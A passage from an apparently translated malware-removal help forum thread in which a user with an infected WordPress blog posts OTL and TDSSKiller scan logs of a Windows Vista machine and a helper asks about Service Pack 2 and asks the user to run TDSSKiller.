03:22:30 | 000,018,432 | ---- | M] () -- C:\Users\DBoy\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini [2013.02.03 14:49:59 | 000,000,138 | ---- | M] () -- C:\Users\DBoy\Desktop\SAMSUNG Dr.Printer.url [2013.02.03 14:45:25 | 027,283,025 | ---- | M] (Samsung ) -- C:\Users\DBoy\Desktop\SamsungUniversalPrintDriver.exe [2 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ] ========== Files Created - No Company Name ========== [2013.02.28 18:42:12 | 000,032,768 | ---- | C] () -- C:\Windows\System32\drivers\sp_rsdrv2.sys [2013.02.28 18:42:10 | 000,000,854 | ---- | C] () -- C:\Users\Public\Desktop\Spyware Terminator 2012.lnk [2013.02.25 18:36:57 | 000,014,927 | ---- | C] () -- C:\Users\DBoy\Desktop\info-button.png [2013.02.25 18:24:11 | 000,005,908 | ---- | C] () -- C:\Users\DBoy\Desktop\airptint.abw [2013.02.23 15:37:05 | 000,110,219 | ---- | C] () -- C:\Users\DBoy\Desktop\button.jpg [2013.02.22 15:07:28 | 000,000,974 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 8.lnk [2013.02.22 15:07:28 | 000,000,962 | ---- 
| C] () -- C:\Users\Public\Desktop\TeamViewer 8.lnk [2013.02.22 13:10:07 | 000,124,839 | ---- | C] () -- C:\Users\DBoy\Desktop\j.jpg [2013.02.22 13:09:38 | 000,177,632 | ---- | C] () -- C:\Users\DBoy\Desktop\l.jpg [2013.02.17 18:01:29 | 000,004,334 | ---- | C] () -- C:\Users\DBoy\Desktop\Ultrasport-Power-Stepper-mit-Handpuls-Sensoren-silber.jpg [2013.02.03 14:49:59 | 000,000,138 | ---- | C] () -- C:\Users\DBoy\Desktop\SAMSUNG Dr.Printer.url [2013.02.03 14:49:57 | 000,483,328 | ---- | C] () -- C:\Windows\ssndii.exe [2013.02.03 14:46:40 | 000,026,624 | ---- | C] () -- C:\Windows\System32\spd__l3.dll [2013.02.03 14:46:40 | 000,000,363 | ---- | C] () -- C:\Windows\System32\spd__l3.smt [2013.02.03 14:46:39 | 000,339,968 | ---- | C] () -- C:\Windows\System32\DscPnt1.dll [2013.02.03 14:46:39 | 000,233,472 | ---- | C] () -- C:\Windows\System32\DscPnt0.dll [2013.02.03 14:46:39 | 000,229,376 | ---- | C] () -- C:\Windows\System32\DscPnt.dll [2013.01.06 13:53:34 | 000,810,496 | ---- | C] () -- C:\Windows\System32\xvidcore.dll [2013.01.06 13:53:34 | 000,183,808 | ---- | C] () -- C:\Windows\System32\xvidvfw.dll [2013.01.06 13:53:34 | 000,080,896 | ---- | C] () -- C:\Windows\System32\ff_vfw.dll [2012.11.19 23:59:29 | 000,018,432 | ---- | C] () -- C:\Users\DBoy\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini [2012.11.13 18:46:30 | 000,106,605 | ---- | C] () -- C:\Windows\System32\StructuredQuerySchema.bin [2012.11.13 18:46:30 | 000,018,904 | ---- | C] () -- C:\Windows\System32\StructuredQuerySchemaTrivial.bin [2012.11.12 06:59:56 | 000,033,136 | ---- | C] () -- C:\Windows\ASScrPro.exe [2012.11.12 06:59:46 | 000,047,672 | ---- | C] () -- C:\Windows\AsScrProlog.exe [2012.11.12 06:19:05 | 000,081,920 | ---- | C] () -- C:\Windows\PGMONITOR.EXE [2012.11.12 06:18:51 | 003,107,788 | ---- | C] () -- C:\Windows\System32\atiumdva.dat [2012.11.12 06:18:50 | 000,159,744 | ---- | C] () -- C:\Windows\System32\atitmmxx.dll [2012.11.12 06:18:50 | 000,081,920 | ---- | C] () -- 
C:\Windows\System32\ATIODE.exe [2012.11.12 06:18:50 | 000,045,056 | ---- | C] () -- C:\Windows\System32\ATIODCLI.exe [2012.11.12 06:18:49 | 000,176,214 | ---- | C] () -- C:\Windows\System32\atiicdxx.dat [2012.11.12 06:17:06 | 001,060,424 | ---- | C] () -- C:\Windows\System32\WdfCoInstaller01000.dll [2012.11.12 06:14:03 | 000,015,928 | ---- | C] ( ) -- C:\Windows\System32\drivers\kbfiltr.sys [2012.11.12 06:12:53 | 001,752,704 | ---- | C] () -- C:\Windows\System32\drivers\snp2uvc.sys [2012.11.12 06:12:53 | 000,028,672 | ---- | C] () -- C:\Windows\System32\drivers\sncduvc.sys [2012.11.12 06:03:45 | 000,000,000 | ---- | C] () -- C:\Windows\ativpsrm.bin [2012.11.12 05:35:03 | 000,000,012 | ---- | C] () -- C:\Windows\bthservsdp.dat [2008.07.02 04:28:38 | 000,061,440 | ---- | C] () -- C:\Program Files\Common Files\CPInstallAction.dll [2008.05.22 18:35:54 | 000,051,962 | ---- | C] () -- C:\Program Files\Common Files\banner.jpg ========== ZeroAccess Check ========== [2006.11.02 13:54:22 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini [HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] [HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] "" = %SystemRoot%\system32\shell32.dll -- [2011.01.21 16:46:32 | 011,582,464 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Apartment [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] "" = %systemroot%\system32\wbem\fastprox.dll -- [2009.03.03 05:36:24 | 000,615,424 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Free [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] "" = %systemroot%\system32\wbem\wbemess.dll -- [2008.01.21 03:24:03 | 000,347,648 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Both ========== LOP Check 
========== [2013.02.25 21:19:50 | 000,000,000 | ---D | M] -- C:\Users\DBoy\AppData\Roaming\AbiSuite [2012.12.31 16:40:54 | 000,000,000 | ---D | M] -- C:\Users\DBoy\AppData\Roaming\DVDVideoSoft [2012.12.31 16:40:36 | 000,000,000 | ---D | M] -- C:\Users\DBoy\AppData\Roaming\DVDVideoSoftIEHelpers [2013.02.28 21:48:09 | 000,000,000 | ---D | M] -- C:\Users\DBoy\AppData\Roaming\FileZilla [2012.12.28 23:31:27 | 000,000,000 | ---D | M] -- C:\Users\DBoy\AppData\Roaming\Notepad++ [2013.02.28 18:42:11 | 000,000,000 | ---D | M] -- C:\Users\DBoy\AppData\Roaming\Spyware Terminator [2012.11.12 18:25:19 | 000,000,000 | ---D | M] -- C:\Users\DBoy\AppData\Roaming\Thunderbird ========== Purity Check ========== ========== Custom Scans ========== < %SYSTEMDRIVE%\*. > [2012.11.11 23:20:31 | 000,000,000 | -HSD | M] -- C:\$Recycle.Bin [2008.04.16 12:27:15 | 000,000,000 | -HSD | M] -- C:\Boot [2006.11.02 14:02:03 | 000,000,000 | -HSD | M] -- C:\Documents and Settings [2012.11.12 18:01:30 | 000,000,000 | ---D | M] -- C:\Firefox [2008.01.21 03:32:31 | 000,000,000 | ---D | M] -- C:\PerfLogs [2013.02.28 18:41:26 | 000,000,000 | R--D | M] -- C:\Program Files [2013.02.28 18:42:11 | 000,000,000 | -H-D | M] -- C:\ProgramData [2013.02.28 22:01:50 | 000,000,000 | -HSD | M] -- C:\System Volume Information [2013.02.03 14:46:19 | 000,000,000 | ---D | M] -- C:\Temp [2012.11.11 23:17:37 | 000,000,000 | R--D | M] -- C:\Users [2013.02.28 18:55:59 | 000,000,000 | ---D | M] -- C:\Windows < %PROGRAMFILES%\*.exe > < %LOCALAPPDATA%\*.exe > < %systemroot%\*. 
|
01.03.2013, 17:15 | #8 |
/// Malware-holic | WordPress blog infected, received mail from Google Hi, why is Vista Service Pack 2 not installed? Please download TDSSKiller.exe and save the file to your desktop
|
02.03.2013, 01:23 | #9 |
| WordPress blog infected, received mail from Google Good evening Markus. Do I need Service Pack 2? Here is the log file for now; I will send you the files by mail shortly. Code:
] BITS C:\Windows\System32\qmgr.dll 01:19:23.0689 5804 BITS - ok 01:19:23.0751 5804 [ D4DF28447741FD3D953526E33A617397 ] blbdrive C:\Windows\system32\drivers\blbdrive.sys 01:19:23.0798 5804 blbdrive - ok 01:19:23.0907 5804 [ DB5BEA73EDAF19AC68B2C0FAD0F92B1A ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe 01:19:23.0939 5804 Bonjour Service - ok 01:19:24.0017 5804 [ 8153396D5551276227FA146900F734E6 ] bowser C:\Windows\system32\DRIVERS\bowser.sys 01:19:24.0048 5804 bowser - ok 01:19:24.0079 5804 [ 9F9ACC7F7CCDE8A15C282D3F88B43309 ] BrFiltLo C:\Windows\system32\drivers\brfiltlo.sys 01:19:24.0126 5804 BrFiltLo - ok 01:19:24.0126 5804 [ 56801AD62213A41F6497F96DEE83755A ] BrFiltUp C:\Windows\system32\drivers\brfiltup.sys 01:19:24.0219 5804 BrFiltUp - ok 01:19:24.0251 5804 [ A3629A0C4226F9E9C72FAAEEBC3AD33C ] Browser C:\Windows\System32\browser.dll 01:19:24.0297 5804 Browser - ok 01:19:24.0313 5804 [ B304E75CFF293029EDDF094246747113 ] Brserid C:\Windows\system32\drivers\brserid.sys 01:19:24.0500 5804 Brserid - ok 01:19:24.0531 5804 [ 203F0B1E73ADADBBB7B7B1FABD901F6B ] BrSerWdm C:\Windows\system32\drivers\brserwdm.sys 01:19:24.0609 5804 BrSerWdm - ok 01:19:24.0641 5804 [ BD456606156BA17E60A04E18016AE54B ] BrUsbMdm C:\Windows\system32\drivers\brusbmdm.sys 01:19:24.0719 5804 BrUsbMdm - ok 01:19:24.0765 5804 [ AF72ED54503F717A43268B3CC5FAEC2E ] BrUsbSer C:\Windows\system32\drivers\brusbser.sys 01:19:24.0843 5804 BrUsbSer - ok 01:19:24.0953 5804 [ AE19CFBBBA41800F3D5343E21D2CA09F ] BthEnum C:\Windows\system32\DRIVERS\BthEnum.sys 01:19:24.0999 5804 BthEnum - ok 01:19:25.0046 5804 [ AD07C1EC6665B8B35741AB91200C6B68 ] BTHMODEM C:\Windows\system32\drivers\bthmodem.sys 01:19:25.0124 5804 BTHMODEM - ok 01:19:25.0155 5804 [ 5904EFA25F829BF84EA6FB045134A1D8 ] BthPan C:\Windows\system32\DRIVERS\bthpan.sys 01:19:25.0202 5804 BthPan - ok 01:19:25.0233 5804 [ 75F19DF0BC62992D05FDD8A32D968531 ] BTHPORT C:\Windows\system32\Drivers\BTHport.sys 01:19:25.0296 5804 BTHPORT - ok 
01:19:25.0374 5804 [ FC930B47A83F5F61DFADC64A0719DE43 ] BthServ C:\Windows\System32\bthserv.dll 01:19:25.0405 5804 BthServ - ok 01:19:25.0421 5804 [ 4CE2A25C5936BC515357D60FEE73F221 ] BTHUSB C:\Windows\system32\Drivers\BTHUSB.sys 01:19:25.0452 5804 BTHUSB - ok 01:19:25.0483 5804 [ 7ADD03E75BEB9E6DD102C3081D29840A ] cdfs C:\Windows\system32\DRIVERS\cdfs.sys 01:19:25.0530 5804 cdfs - ok 01:19:25.0561 5804 [ 1EC25CEA0DE6AC4718BF89F9E1778B57 ] cdrom C:\Windows\system32\DRIVERS\cdrom.sys 01:19:25.0608 5804 cdrom - ok 01:19:25.0655 5804 [ 87C2D0377B23E2D8A41093C2F5FB1A5B ] CertPropSvc C:\Windows\System32\certprop.dll 01:19:25.0701 5804 CertPropSvc - ok 01:19:25.0717 5804 [ E5D4133F37219DBCFE102BC61072589D ] circlass C:\Windows\system32\drivers\circlass.sys 01:19:25.0764 5804 circlass - ok 01:19:25.0779 5804 [ 465745561C832B29F7C48B488AAB3842 ] CLFS C:\Windows\system32\CLFS.sys 01:19:25.0842 5804 CLFS - ok 01:19:25.0982 5804 [ D87ACAED61E417BBA546CED5E7E36D9C ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe 01:19:26.0123 5804 clr_optimization_v2.0.50727_32 - ok 01:19:26.0185 5804 [ C5A75EB48E2344ABDC162BDA79E16841 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe 01:19:26.0247 5804 clr_optimization_v4.0.30319_32 - ok 01:19:26.0294 5804 [ 99AFC3795B58CC478FBBBCDC658FCB56 ] CmBatt C:\Windows\system32\DRIVERS\CmBatt.sys 01:19:26.0341 5804 CmBatt - ok 01:19:26.0357 5804 [ 0CA25E686A4928484E9FDABD168AB629 ] cmdide C:\Windows\system32\drivers\cmdide.sys 01:19:26.0388 5804 cmdide - ok 01:19:26.0403 5804 [ 6AFEF0B60FA25DE07C0968983EE4F60A ] Compbatt C:\Windows\system32\DRIVERS\compbatt.sys 01:19:26.0419 5804 Compbatt - ok 01:19:26.0419 5804 COMSysApp - ok 01:19:26.0435 5804 [ 741E9DFF4F42D2D8477D0FC1DC0DF871 ] crcdisk C:\Windows\system32\drivers\crcdisk.sys 01:19:26.0466 5804 crcdisk - ok 01:19:26.0481 5804 [ 1F07BECDCA750766A96CDA811BA86410 ] Crusoe C:\Windows\system32\drivers\crusoe.sys 
01:19:26.0528 5804 Crusoe - ok 01:19:26.0575 5804 [ 6DE363F9F99334514C46AEC02D3E3678 ] CryptSvc C:\Windows\system32\cryptsvc.dll 01:19:26.0637 5804 CryptSvc - ok 01:19:26.0871 5804 [ 301AE00E12408650BADDC04DBC832830 ] DcomLaunch C:\Windows\system32\rpcss.dll 01:19:26.0996 5804 DcomLaunch - ok 01:19:27.0059 5804 [ A3E9FA213F443AC77C7746119D13FEEC ] DfsC C:\Windows\system32\Drivers\dfsc.sys 01:19:27.0121 5804 DfsC - ok 01:19:27.0246 5804 [ FA3463F25F9CC9C3BCF1E7912FEFF099 ] DFSR C:\Windows\system32\DFSR.exe 01:19:27.0417 5804 DFSR - ok 01:19:27.0511 5804 DgiVecp - ok 01:19:27.0558 5804 [ 43A988A9C10333476CB5FB667CBD629D ] Dhcp C:\Windows\System32\dhcpcsvc.dll 01:19:27.0620 5804 Dhcp - ok 01:19:27.0636 5804 [ 64109E623ABD6955C8FB110B592E68B7 ] disk C:\Windows\system32\drivers\disk.sys 01:19:27.0651 5804 disk - ok 01:19:27.0729 5804 [ 4805D9A6D281C7A7DEFD9094DEC6AF7D ] Dnscache C:\Windows\System32\dnsrslvr.dll 01:19:27.0792 5804 Dnscache - ok 01:19:27.0823 5804 [ 5AF620A08C614E24206B79E8153CF1A8 ] dot3svc C:\Windows\System32\dot3svc.dll 01:19:28.0010 5804 dot3svc - ok 01:19:28.0026 5804 [ A622E888F8AA2F6B49E9BC466F0E5DEF ] DPS C:\Windows\system32\dps.dll 01:19:28.0088 5804 DPS - ok 01:19:28.0119 5804 [ 97FEF831AB90BEE128C9AF390E243F80 ] drmkaud C:\Windows\system32\drivers\drmkaud.sys 01:19:28.0151 5804 drmkaud - ok 01:19:28.0229 5804 [ 85F33880B8CFB554BD3D9CCDB486845A ] DXGKrnl C:\Windows\System32\drivers\dxgkrnl.sys 01:19:28.0322 5804 DXGKrnl - ok 01:19:28.0416 5804 [ 5425F74AC0C1DBD96A1E04F17D63F94C ] E1G60 C:\Windows\system32\DRIVERS\E1G60I32.sys 01:19:28.0463 5804 E1G60 - ok 01:19:28.0494 5804 [ C0B95E40D85CD807D614E264248A45B9 ] EapHost C:\Windows\System32\eapsvc.dll 01:19:28.0541 5804 EapHost - ok 01:19:28.0650 5804 [ DD2CD259D83D8B72C02C5F2331FF9D68 ] Ecache C:\Windows\system32\drivers\ecache.sys 01:19:28.0681 5804 Ecache - ok 01:19:28.0790 5804 [ 9BE3744D295A7701EB425332014F0797 ] ehRecvr C:\Windows\ehome\ehRecvr.exe 01:19:28.0868 5804 ehRecvr - ok 
01:19:28.0899 5804 [ AD1870C8E5D6DD340C829E6074BF3C3F ] ehSched C:\Windows\ehome\ehsched.exe 01:19:28.0977 5804 ehSched - ok 01:19:29.0009 5804 [ C27C4EE8926E74AA72EFCAB24C5242C3 ] ehstart C:\Windows\ehome\ehstart.dll 01:19:29.0024 5804 ehstart - ok 01:19:29.0118 5804 [ 23B62471681A124889978F6295B3F4C6 ] elxstor C:\Windows\system32\drivers\elxstor.sys 01:19:29.0149 5804 elxstor - ok 01:19:29.0243 5804 [ 70B1A86DF0C8EAD17D2BC332EDAE2C7C ] EMDMgmt C:\Windows\system32\emdmgmt.dll 01:19:29.0336 5804 EMDMgmt - ok 01:19:29.0414 5804 [ 3DB974F3935483555D7148663F726C61 ] ErrDev C:\Windows\system32\drivers\errdev.sys 01:19:29.0461 5804 ErrDev - ok 01:19:29.0555 5804 [ 3CB3343D720168B575133A0A20DC2465 ] EventSystem C:\Windows\system32\es.dll 01:19:29.0617 5804 EventSystem - ok 01:19:29.0664 5804 [ 0D858EB20589A34EFB25695ACAA6AA2D ] exfat C:\Windows\system32\drivers\exfat.sys 01:19:29.0711 5804 exfat - ok 01:19:29.0757 5804 [ 3C489390C2E2064563727752AF8EAB9E ] fastfat C:\Windows\system32\drivers\fastfat.sys 01:19:29.0804 5804 fastfat - ok 01:19:29.0851 5804 [ AFE1E8B9782A0DD7FB46BBD88E43F89A ] fdc C:\Windows\system32\DRIVERS\fdc.sys 01:19:29.0898 5804 fdc - ok 01:19:29.0991 5804 [ 6629B5F0E98151F4AFDD87567EA32BA3 ] fdPHost C:\Windows\system32\fdPHost.dll 01:19:30.0085 5804 fdPHost - ok 01:19:30.0085 5804 [ 89ED56DCE8E47AF40892778A5BD31FD2 ] FDResPub C:\Windows\system32\fdrespub.dll 01:19:30.0194 5804 FDResPub - ok 01:19:30.0210 5804 [ A8C0139A884861E3AAE9CFE73B208A9F ] FileInfo C:\Windows\system32\drivers\fileinfo.sys 01:19:30.0241 5804 FileInfo - ok 01:19:30.0272 5804 [ 0AE429A696AECBC5970E3CF2C62635AE ] Filetrace C:\Windows\system32\drivers\filetrace.sys 01:19:30.0319 5804 Filetrace - ok 01:19:30.0366 5804 [ 85B7CF99D532820495D68D747FDA9EBD ] flpydisk C:\Windows\system32\DRIVERS\flpydisk.sys 01:19:30.0413 5804 flpydisk - ok 01:19:30.0428 5804 [ 05EA53AFE985443011E36DAB07343B46 ] FltMgr C:\Windows\system32\drivers\fltmgr.sys 01:19:30.0444 5804 FltMgr - ok 01:19:30.0506 5804 
[ C9BE08664611DDAF98E2331E9288B00B ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe 01:19:30.0522 5804 FontCache3.0.0.0 - ok 01:19:30.0553 5804 [ 65EA8B77B5851854F0C55C43FA51A198 ] Fs_Rec C:\Windows\system32\drivers\Fs_Rec.sys 01:19:30.0584 5804 Fs_Rec - ok 01:19:30.0615 5804 [ 34582A6E6573D54A07ECE5FE24A126B5 ] gagp30kx C:\Windows\system32\drivers\gagp30kx.sys 01:19:30.0647 5804 gagp30kx - ok 01:19:30.0662 5804 [ 185ADA973B5020655CEE342059A86CBB ] GEARAspiWDM C:\Windows\system32\DRIVERS\GEARAspiWDM.sys 01:19:30.0693 5804 GEARAspiWDM - ok 01:19:30.0725 5804 [ D9F1113D9401185245573350712F92FC ] gpsvc C:\Windows\System32\gpsvc.dll 01:19:30.0834 5804 gpsvc - ok 01:19:30.0943 5804 [ CB04C744BE0A61B1D648FAED182C3B59 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys 01:19:31.0021 5804 HdAudAddService - ok 01:19:31.0068 5804 [ C87B1EE051C0464491C1A7B03FA0BC99 ] HDAudBus C:\Windows\system32\DRIVERS\HDAudBus.sys 01:19:31.0115 5804 HDAudBus - ok 01:19:31.0130 5804 [ 1338520E78D90154ED6BE8F84DE5FCEB ] HidBth C:\Windows\system32\drivers\hidbth.sys 01:19:31.0208 5804 HidBth - ok 01:19:31.0239 5804 [ FF3160C3A2445128C5A6D9B076DA519E ] HidIr C:\Windows\system32\drivers\hidir.sys 01:19:31.0317 5804 HidIr - ok 01:19:31.0364 5804 [ 53D5A2F9CE6AE47D7507727DF1DA79F8 ] hidserv C:\Windows\system32\hidserv.dll 01:19:31.0427 5804 hidserv - ok 01:19:31.0442 5804 [ 854CA287AB7FAF949617A788306D967E ] HidUsb C:\Windows\system32\DRIVERS\hidusb.sys 01:19:31.0489 5804 HidUsb - ok 01:19:31.0520 5804 [ D8AD255B37DA92434C26E4876DB7D418 ] hkmsvc C:\Windows\system32\kmsvc.dll 01:19:31.0614 5804 hkmsvc - ok 01:19:31.0629 5804 [ 16EE7B23A009E00D835CDB79574A91A6 ] HpCISSs C:\Windows\system32\drivers\hpcisss.sys 01:19:31.0645 5804 HpCISSs - ok 01:19:31.0692 5804 [ 96E241624C71211A79C84F50A8E71CAB ] HTTP C:\Windows\system32\drivers\HTTP.sys 01:19:31.0723 5804 HTTP - ok 01:19:31.0785 5804 [ C6B032D69650985468160FC9937CF5B4 ] i2omp 
C:\Windows\system32\drivers\i2omp.sys 01:19:31.0801 5804 i2omp - ok 01:19:31.0848 5804 [ 22D56C8184586B7A1F6FA60BE5F5A2BD ] i8042prt C:\Windows\system32\DRIVERS\i8042prt.sys 01:19:31.0895 5804 i8042prt - ok 01:19:31.0926 5804 [ 54155EA1B0DF185878E0FC9EC3AC3A14 ] iaStorV C:\Windows\system32\drivers\iastorv.sys 01:19:32.0036 5804 iaStorV - ok 01:19:32.0098 5804 [ 7B630ACAED64FEF0C3E1CF255CB56686 ] idsvc C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe 01:19:32.0239 5804 idsvc - ok 01:19:32.0254 5804 [ 2D077BF86E843F901D8DB709C95B49A5 ] iirsp C:\Windows\system32\drivers\iirsp.sys 01:19:32.0286 5804 iirsp - ok 01:19:32.0317 5804 [ A3BC480A2BF8AA8E4DABD2D5DCE0AFAC ] IKEEXT C:\Windows\System32\ikeext.dll 01:19:32.0410 5804 IKEEXT - ok 01:19:32.0598 5804 [ D9B869A909CC93AEC507D4F7DFA24434 ] IntcAzAudAddService C:\Windows\system32\drivers\RTKVHDA.sys 01:19:32.0769 5804 IntcAzAudAddService - ok 01:19:32.0894 5804 [ 83AA759F3189E6370C30DE5DC5590718 ] intelide C:\Windows\system32\drivers\intelide.sys 01:19:32.0925 5804 intelide - ok 01:19:32.0956 5804 [ 224191001E78C89DFA78924C3EA595FF ] intelppm C:\Windows\system32\DRIVERS\intelppm.sys 01:19:32.0988 5804 intelppm - ok 01:19:33.0034 5804 [ 9AC218C6E6105477484C6FDBE7D409A4 ] IPBusEnum C:\Windows\system32\ipbusenum.dll 01:19:33.0144 5804 IPBusEnum - ok 01:19:33.0159 5804 [ 62C265C38769B864CB25B4BCF62DF6C3 ] IpFilterDriver C:\Windows\system32\DRIVERS\ipfltdrv.sys 01:19:33.0206 5804 IpFilterDriver - ok 01:19:33.0284 5804 [ 6A35D233693EDC29A12742049BC5E37F ] iphlpsvc C:\Windows\System32\iphlpsvc.dll 01:19:33.0378 5804 iphlpsvc - ok 01:19:33.0378 5804 IpInIp - ok 01:19:33.0440 5804 [ B25AAF203552B7B3491139D582B39AD1 ] IPMIDRV C:\Windows\system32\drivers\ipmidrv.sys 01:19:33.0502 5804 IPMIDRV - ok 01:19:33.0549 5804 [ 8793643A67B42CEC66490B2A0CF92D68 ] IPNAT C:\Windows\system32\DRIVERS\ipnat.sys 01:19:33.0596 5804 IPNAT - ok 01:19:33.0643 5804 [ E8A39D41474BE42FD8830CED32932D6C ] iPod Service 
C:\Program Files\iPod\bin\iPodService.exe 01:19:33.0674 5804 iPod Service - ok 01:19:33.0736 5804 [ 109C0DFB82C3632FBD11949B73AEEAC9 ] IRENUM C:\Windows\system32\drivers\irenum.sys 01:19:33.0783 5804 IRENUM - ok 01:19:33.0814 5804 [ 6C70698A3E5C4376C6AB5C7C17FB0614 ] isapnp C:\Windows\system32\drivers\isapnp.sys 01:19:33.0830 5804 isapnp - ok 01:19:33.0846 5804 [ F247EEC28317F6C739C16DE420097301 ] iScsiPrt C:\Windows\system32\DRIVERS\msiscsi.sys 01:19:33.0877 5804 iScsiPrt - ok 01:19:33.0892 5804 [ BCED60D16156E428F8DF8CF27B0DF150 ] iteatapi C:\Windows\system32\drivers\iteatapi.sys 01:19:33.0924 5804 iteatapi - ok 01:19:33.0955 5804 [ 06FA654504A498C30ADCA8BEC4E87E7E ] iteraid C:\Windows\system32\drivers\iteraid.sys 01:19:33.0955 5804 iteraid - ok 01:19:33.0986 5804 [ 37605E0A8CF00CBBA538E753E4344C6E ] kbdclass C:\Windows\system32\DRIVERS\kbdclass.sys 01:19:34.0017 5804 kbdclass - ok 01:19:34.0048 5804 [ 18247836959BA67E3511B62846B9C2E0 ] kbdhid C:\Windows\system32\drivers\kbdhid.sys 01:19:34.0080 5804 kbdhid - ok 01:19:34.0158 5804 [ 27BD4AC228EF6C0D490617C32E86A672 ] kbfiltr C:\Windows\system32\DRIVERS\kbfiltr.sys 01:19:34.0173 5804 kbfiltr - ok 01:19:34.0236 5804 [ A911ECAC81F94ADEAFBE8E3F7873EDB0 ] KeyIso C:\Windows\system32\lsass.exe 01:19:34.0329 5804 KeyIso - ok 01:19:34.0360 5804 [ 7A0CF7908B6824D6A2A1D313E5AE3DCA ] KSecDD C:\Windows\system32\Drivers\ksecdd.sys 01:19:34.0392 5804 KSecDD - ok 01:19:34.0501 5804 [ 8078F8F8F7A79E2E6B494523A828C585 ] KtmRm C:\Windows\system32\msdtckrm.dll 01:19:34.0579 5804 KtmRm - ok 01:19:34.0610 5804 [ 1925E63C91CF1610AE41BFD539062079 ] LanmanServer C:\Windows\system32\srvsvc.dll 01:19:34.0719 5804 LanmanServer - ok 01:19:34.0797 5804 [ 2AE2E1628C5D3F1C0A46A67C9FA1DF15 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll 01:19:34.0906 5804 LanmanWorkstation - ok 01:19:34.0938 5804 [ D1C5883087A0C3F1344D9D55A44901F6 ] lltdio C:\Windows\system32\DRIVERS\lltdio.sys 01:19:34.0984 5804 lltdio - ok 01:19:35.0078 5804 [ 
2D5A428872F1442631D0959A34ABFF63 ] lltdsvc C:\Windows\System32\lltdsvc.dll 01:19:35.0156 5804 lltdsvc - ok 01:19:35.0187 5804 [ 35D40113E4A5B961B6CE5C5857702518 ] lmhosts C:\Windows\System32\lmhsvc.dll 01:19:35.0281 5804 lmhosts - ok 01:19:35.0343 5804 [ C7E15E82879BF3235B559563D4185365 ] LSI_FC C:\Windows\system32\drivers\lsi_fc.sys 01:19:35.0359 5804 LSI_FC - ok 01:19:35.0406 5804 [ EE01EBAE8C9BF0FA072E0FF68718920A ] LSI_SAS C:\Windows\system32\drivers\lsi_sas.sys 01:19:35.0421 5804 LSI_SAS - ok 01:19:35.0452 5804 [ 912A04696E9CA30146A62AFA1463DD5C ] LSI_SCSI C:\Windows\system32\drivers\lsi_scsi.sys 01:19:35.0484 5804 LSI_SCSI - ok 01:19:35.0499 5804 [ 8F5C7426567798E62A3B3614965D62CC ] luafv C:\Windows\system32\drivers\luafv.sys 01:19:35.0530 5804 luafv - ok 01:19:35.0593 5804 [ 8039F480C192DD99FED4EBC71FFBF795 ] lullaby C:\Windows\system32\DRIVERS\lullaby.sys 01:19:35.0608 5804 lullaby - ok 01:19:35.0671 5804 [ AEF9BABB8A506BC4CE0451A64AADED46 ] Mcx2Svc C:\Windows\system32\Mcx2Svc.dll 01:19:35.0718 5804 Mcx2Svc - ok 01:19:35.0764 5804 [ 0001CE609D66632FA17B84705F658879 ] megasas C:\Windows\system32\drivers\megasas.sys 01:19:35.0780 5804 megasas - ok 01:19:35.0842 5804 [ C252F32CD9A49DBFC25ECF26EBD51A99 ] MegaSR C:\Windows\system32\drivers\megasr.sys 01:19:35.0889 5804 MegaSR - ok 01:19:35.0936 5804 [ 1076FFCFFAAE8385FD62DFCB25AC4708 ] MMCSS C:\Windows\system32\mmcss.dll 01:19:36.0014 5804 MMCSS - ok 01:19:36.0061 5804 [ E13B5EA0F51BA5B1512EC671393D09BA ] Modem C:\Windows\system32\drivers\modem.sys 01:19:36.0092 5804 Modem - ok 01:19:36.0108 5804 [ 0A9BB33B56E294F686ABB7C1E4E2D8A8 ] monitor C:\Windows\system32\DRIVERS\monitor.sys 01:19:36.0154 5804 monitor - ok 01:19:36.0170 5804 [ 5BF6A1326A335C5298477754A506D263 ] mouclass C:\Windows\system32\DRIVERS\mouclass.sys 01:19:36.0186 5804 mouclass - ok 01:19:36.0201 5804 [ 93B8D4869E12CFBE663915502900876F ] mouhid C:\Windows\system32\DRIVERS\mouhid.sys 01:19:36.0248 5804 mouhid - ok 01:19:36.0264 5804 [ 
